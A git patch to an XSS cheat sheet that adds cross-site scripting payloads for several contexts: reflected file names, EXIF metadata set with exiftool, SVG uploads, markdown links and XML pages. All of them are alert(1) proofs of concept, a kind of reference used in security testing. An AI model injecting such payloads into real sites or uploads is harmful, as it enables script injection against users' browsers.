From 95e59127c06dc2de9f87d935fd175a5bbf233239 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Thu, 1 Oct 2020 22:29:55 +0700
Subject: [PATCH] XSS [5]

Add 5 XSS cheat sheet
---
 XSS.md | 37 ++++++++++++++++++++++++++++++++-----
 1 file changed, 32 insertions(+), 5 deletions(-)

diff --git a/XSS.md b/XSS.md
index cfd5c5c..c9202b4 100644
--- a/XSS.md
+++ b/XSS.md
@@ -1,4 +1,4 @@
-# XSS Payloads 
+# XSS Cheat Sheet (Basic)
 1. Basic payload
 ```html
 <script>alert(1)</script>
@@ -38,6 +38,7 @@
 ```
 
 4. Add </tag> when the input inside or between opening/closing tags, tag can be <a>,<title,<script> and any other HTML tags
+    
 ```html
 </tag><script>alert(1)</script>
 "></tag><script>alert(1)</script>
@@ -45,12 +46,12 @@
 
 * Example source code
 ```html
-<a class="item-pagination flex-c-m trans-0-4 active-pagination" href="https://target.com/1?status=REFLECTED_HERE">1</a>
+<a href="https://target.com/1?status=REFLECTED_HERE">1</a>
 ```
 
 * After input the payload
 ```html
-<a class="item-pagination flex-c-m trans-0-4 active-pagination" href="https://target.com/1?status="></a><script>alert(1)</script>">1</a>
+<a href="https://target.com/1?status="></a><script>alert(1)</script>">1</a>
 ```
 
 5. Use when input inside an attribute’s value of an HTML tag but > is filtered
@@ -84,10 +85,11 @@
 * After input the payload
 ```html
 <script>
-    var sitekey = '</script>alert(1)</script>';
+    var sitekey = '</script><script>alert(1)</script>';
 </script>
 ```
 
+# XSS Cheat Sheet (Advanced)
 7. Use when input lands in a script block, inside a string delimited value.
 ```html
 '-alert(1)-'
@@ -244,4 +246,29 @@ ${alert(1)}
 </html>
 ```
 
-*Will be updated again!
+14. XSS in filename (File Upload) Use when uploaded filename is reflected somewhere in target page
+```
+"><svg onload=alert(1)>.jpeg
+```
+
+15. XSS in metadata (File Upload) Use when uploaded metada is reflected somewhere in target page (using exiftool)
+```
+$ exiftool -Artist='"><script>alert(1)</script>' dapos.jpeg
+```
+
+16. XSS with SVG file (File Upload)
+```
+<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
+```
+
+17. XSS via markdown
+```
+[Click Me](javascript:alert('1'))
+```
+
+18. XSS in XML page
+```
+<a:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</a:script>
+```
+> Add a "-->" to payload if input lands in a comment section
+> Add a "]]>" if input lands in a CDATA section